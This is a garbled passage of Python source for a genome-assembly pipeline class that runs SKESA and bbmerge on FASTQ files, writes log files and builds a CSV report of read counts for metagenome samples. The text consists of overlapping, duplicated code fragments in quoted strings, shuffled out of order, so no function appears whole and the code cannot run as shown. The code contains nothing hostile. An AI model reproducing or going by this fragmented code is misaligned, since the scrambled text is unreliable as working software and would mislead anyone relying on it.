Create a report with the total number of reads, and the number", "line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the", "import CalledProcessError from click import progressbar import logging import shutil import os __author__", "os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout,", "pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status = 'unknown' if status", "# Extract the total number of reads, and the number of reads that", "\"\"\" with progressbar(self.metadata) as bar: for sample in bar: # Initialise the assembly", "error file :return: num_reads, the total number of reads, paired_reads, number of paired", "there are two fastq files if len(fastqfiles) == 2: # Set the reverse", "\\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single", "make_path(merge_path) # Set the name of the merged, and unmerged files sample.general.mergedreads =", "with progressbar(self.metadata) as bar: for sample in bar: # Initialise the assembly command", "files for use in metagenomics pipelines. 
Create a report with the total number", "of paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads = 0", "added - useful if re-running # the analysis else: lines = list() with", "metagenome \"\"\" # Set the assembly file to 'NA' as assembly is not", "run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr,", "sample: metadata sample object flagged as a metagenome \"\"\" # Set the assembly", "just an empty file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile", "skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in bar:", "\\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no", "sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self,", "err stream num_reads, num_pairs = self.reads(error) # If the report doesn't exist, create", "fastqfiles[0] gz = True if '.gz' in forward else False # If there", "# err stream num_reads, num_pairs = self.reads(error) # If the report doesn't exist,", "as the number of reads that could be paired :param err_log: bbmerge outputs", "assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge", "# Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores", "' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are", "not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd = 
bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads,", "= os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out,", "assembler is present. If not, set the .bestassembly attribute to 'NA' \"\"\" for", "= os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the merged FASTQ", "main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with", "1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files,", "it with the header and the results from the first sample if not", "# Set the name of the report to store the metagenome file merging", "which samples have already been added - useful if re-running # the analysis", "make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click", "sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble,", "store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the", "def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path", "'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add", "'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name", "'NA' \"\"\" for sample in self.metadata: try: # Set the name of the", "\\ 
os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if", "if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble)", "= fastqfiles forward = fastqfiles[0] gz = True if '.gz' in forward else", "Set the name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size", "useful if re-running # the analysis else: lines = list() with open(report, 'r')", "except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata =", "merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set", "== 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all", "spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the", "name of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log", "the report to store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv')", "output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't", "else: sample.general.bestassemblyfile = 'NA' # Add the name and path of the filtered", "FASTQ files for use in metagenomics pipelines. 
Create a report with the total", "and the number of reads that could be paired :param sample: metadata sample", "if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) #", "'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and", "analysis else: lines = list() with open(report, 'r') as report_file: for line in", "os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly output", "sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name", "for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) ==", "return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from", "# Merge path - keep all the merged FASTQ files in one directory", "= os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta'", "be paired from the bbmerge # err stream num_reads, num_pairs = self.reads(error) #", "'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly output file", "of reads that could be paired from the bbmerge # err stream num_reads,", "no fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq =", "# Initialise the assembly command 
sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If", "= 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles),", "= 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the", "= 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA'", "and path of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile except", "'w') as log_file: log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError):", "assembly isn't just an empty file if size == 0: sample.general.bestassemblyfile = 'NA'", "= 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' #", "= fastqfiles[0] gz = True if '.gz' in forward else False # If", "paired from the bbmerge # err stream num_reads, num_pairs = self.reads(error) # If", "if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile)", "open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results", "run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status = 'unknown'", "for sample in self.metadata: try: # Set the name of the filtered assembly", "doesn't exist, create it with the header and the results from the first", "information for line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif", "status == 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output = 
os.path.join(sample.general.outputdirectory,", "self.reads(error) # If the report doesn't exist, create it with the header and", "only merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) #", "err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with", "= 0 paired_reads = 0 # Open the log file with open(err_log, 'r')", "variables num_reads = 0 paired_reads = 0 # Open the log file with", "the merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) #", "= True if '.gz' in forward else False # If there are two", "of reads, as well as the number of reads that could be paired", "assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is", "stats in the error file :return: num_reads, the total number of reads, paired_reads,", "the first sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name,", "directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged,", "error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report", "else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the", "delattr(sample.general, 'mergedreads') # Set the name of the report to store the metagenome", "report_file: lines.append(line.split(',')[0]) # Add the results to the report if sample.name not in", "= sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: 
sample.general.bestassemblyfile = 'NA' # Add the name and", "are two fastq files if len(fastqfiles) == 2: # Set the reverse fastq", "sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample):", "inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path", "results from the first sample if not os.path.isfile(report): with open(report, 'w') as report_file:", "if '.gz' in forward else False # If there are two fastq files", "and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error", "to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' #", "size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else:", "import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from", "# Set the assembly file to 'NA' as assembly is not desirable for", "subprocess import CalledProcessError from click import progressbar import logging import shutil import os", "header and the results from the first sample if not os.path.isfile(report): with open(report,", "in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return", "the report if sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n'", "open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse", "\"\"\" for sample in self.metadata: try: # Set 
the name of the filtered", "--vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above,", "from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import", "a report with the total number of reads, and the number of reads", "filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata", "logging import shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble()", "in bar: # Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles:", "len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep", "the bbmerge # err stream num_reads, num_pairs = self.reads(error) # If the report", "report if sample.name not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name,", ".format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the", "'{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq", "two fastq files if len(fastqfiles) == 2: # Set the reverse fastq name", "from the assembler is present. 
If not, set the .bestassembly attribute to 'NA'", "else False # If there are two fastq files if len(fastqfiles) == 2:", "and the number of reads that could be paired from the bbmerge #", "the header and the results from the first sample if not os.path.isfile(report): with", "\"\"\" Parse the outputs from bbmerge to extract the total number of reads,", "determine which samples have already been added - useful if re-running # the", "\"\"\" # Initialise variables num_reads = 0 paired_reads = 0 # Open the", "from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import progressbar import", "the name of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name))", "be paired :param err_log: bbmerge outputs the stats in the error file :return:", "forward else False # If there are two fastq files if len(fastqfiles) ==", "outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the merged", "os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\"", "of reads, paired_reads, number of paired readds \"\"\" # Initialise variables num_reads =", "import shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile()", "file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered", "threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate the metadata appropriately", "else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile =", "if sample.name not in lines: with open(report, 'a+') as report_file: 
report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads,", "inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies')) make_path(self.reportpath) logging.info('Assembling", "sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath", "except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else: # Set", "sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output =", "'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly", "fastqfiles forward = fastqfiles[0] gz = True if '.gz' in forward else False", "readds \"\"\" # Initialise variables num_reads = 0 paired_reads = 0 # Open", "1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but", "above, but use single read settings for the assembler else: sample.commands.assemble = 'skesa", "the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out,", "self.metadata: try: # Set the name of the filtered assembly file filtered_outputfile =", "Use bbmerge to merge paired FASTQ files for use in metagenomics pipelines. 
Create", "= 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA'", "# Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output,", "num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the", "= filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject):", "'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq", "metadata sample object flagged as a metagenome \"\"\" # Set the assembly file", "'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile", "the name and path of the filtered file to the metadata sample.general.filteredfile =", "--fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile)", "it. 
Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status", "# If there are no fastq files, populate the metadata appropriately else: sample.general.assembly_output", "total number of reads, as well as the number of reads that could", "Open the log file with open(err_log, 'r') as error_log: # Extract the necessary", "fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq = fastqfiles", "not, set the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try:", "= os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly", "# Same as above, but use single read settings for the assembler else:", "assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the", "of reads that could be paired :param err_log: bbmerge outputs the stats in", "files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile", "num_reads = 0 paired_reads = 0 # Open the log file with open(err_log,", "as bar: for sample in bar: # Initialise the assembly command sample.commands.assemble =", "if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path -", "for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\", "{fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) #", "is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end", "not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if", "write_to_logfile(out, err, 
self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out)", "file with open(err_log, 'r') as error_log: # Extract the necessary information for line", "the results from the first sample if not os.path.isfile(report): with open(report, 'w') as", "'unknown' if status == 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output", "files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if '.gz' in", "= 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\", "= os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run", "0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile =", "= 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus =", "have already been added - useful if re-running # the analysis else: lines", "in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line:", "of the merged, and unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log =", "= 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath =", "name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent", "the total number of reads, paired_reads, number of paired readds \"\"\" # Initialise", "the number of reads that could be paired from the bbmerge # err", "os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd = 
bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True,", "\"\"\" Determine whether the contigs.fasta output file from the assembler is present. If", "AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else: # Set the", "def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\"", "paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads = 0 #", "sample is a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline try:", "output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile", "log file with open(err_log, 'r') as error_log: # Extract the necessary information for", "Determine whether the contigs.fasta output file from the assembler is present. If not,", "merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge", "the number of reads that could be paired :param sample: metadata sample object", "of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) #", "sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles =", "pure isolate, assemble it. 
Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description", "of reads that could be paired :param sample: metadata sample object flagged as", "been added - useful if re-running # the analysis else: lines = list()", "paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the", "extract the total number of reads, as well as the number of reads", "Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz", "error_log: # Extract the necessary information for line in error_log: if 'Pairs:' in", "merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged, and", "the total number of reads, and the number of reads that could be", "directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile =", "# Add the name and path of the filtered file to the metadata", "in forward else False # If there are two fastq files if len(fastqfiles)", "and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble,", "bbmerge # err stream num_reads, num_pairs = self.reads(error) # If the report doesn't", "def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the total number", "if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an", "Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus)", "'Joined:' in line: 
paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine", "as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results to the", "err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to", "Initialise variables num_reads = 0 paired_reads = 0 # Open the log file", "'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err =", "number of reads that could be paired from the bbmerge # err stream", "# Open the log file with open(err_log, 'r') as error_log: # Extract the", "all the merged FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path)", "sample object flagged as a metagenome \"\"\" # Set the assembly file to", "import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self):", "False # If there are two fastq files if len(fastqfiles) == 2: #", "if re-running # the analysis else: lines = list() with open(report, 'r') as", "paired_reads = 0 # Open the log file with open(err_log, 'r') as error_log:", "to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile =", "merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files for use in", "command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a", "filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and path of the", "import progressbar import logging import shutil import os __author__ = 'adamkoziol' class Skesa(object):", "try: # Set the name of the filtered assembly file filtered_outputfile = os.path.join(self.path,", "# Can only merge paired-end if len(sample.general.fastqfiles) == 2: 
outpath = os.path.join(sample.general.outputdirectory, 'merged_reads')", "file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile,", "Extract the total number of reads, and the number of reads that could", "that could be paired :param sample: metadata sample object flagged as a metagenome", "line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file", "paired :param sample: metadata sample object flagged as a metagenome \"\"\" # Set", "assemble it. Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError:", "reads, paired_reads, number of paired readds \"\"\" # Initialise variables num_reads = 0", "report doesn't exist, create it with the header and the results from the", "the report exists, open it to determine which samples have already been added", "as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only", "Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta'", "sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None)", "self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def", "report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and the", "= 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err", "paired FASTQ 
files for use in metagenomics pipelines. Create a report with the", "else: lines = list() with open(report, 'r') as report_file: for line in report_file:", "number of reads, paired_reads, number of paired readds \"\"\" # Initialise variables num_reads", "a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline try: status =", "os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err,", "' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) #", "line in report_file: lines.append(line.split(',')[0]) # Add the results to the report if sample.name", "sample.general.assemblyfile shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and path", "class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble", "# Set the name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies',", "filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades", "unmerged files sample.general.mergedreads = \\ os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error =", "reads that could be paired :param err_log: bbmerge outputs the stats in the", "= inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath =", "the name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size =", "self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile", "to assemble genomes \"\"\" with 
progressbar(self.metadata) as bar: for sample in bar: #", "\"\"\" Use bbmerge to merge paired FASTQ files for use in metagenomics pipelines.", "report to store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') #", "{contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate the", "sample.general.logerr, None, None) def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ", "= self.reads(error) # If the report doesn't exist, create it with the header", "status = 'unknown' if status == 'metagenome': self.merge(sample) else: # Set the output", "2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the", "as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of", "of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set the", "merge paired FASTQ files for use in metagenomics pipelines. 
